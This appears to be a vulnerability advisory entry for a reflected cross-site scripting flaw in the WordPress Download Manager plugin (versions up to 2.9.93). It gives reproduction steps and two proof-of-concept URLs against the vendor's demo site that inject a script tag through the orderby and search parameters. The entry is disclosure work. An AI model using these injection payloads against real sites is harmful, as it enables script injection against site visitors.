Lucene search

K
wpexploitMgThuraMoeMyintWPEX-ID:333D63EB-7846-4CC3-ABD9-B00E12B25037
HistoryApr 17, 2019 - 12:00 a.m.

Download Manager <= 2.9.93 - Authenticated Cross-Site Scripting (XSS)

2019-04-1700:00:00
MgThuraMoeMyint
14

0.033 Low

EPSS

Percentile

91.3%

In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publish_date . By adding parameter “> and add any XSS payload , the xss payload will execute. To reproduce, 1. Go to the link where we can find ?orderby 2. Add parameters >” and give simple payload like 3. The payload will execute. Another reflected cross-site scripting via advance search .

https://demo.wpdownloadmanager.com/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc

https://demo.wpdownloadmanager.com/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a

0.033 Low

EPSS

Percentile

91.3%

Related for WPEX-ID:333D63EB-7846-4CC3-ABD9-B00E12B25037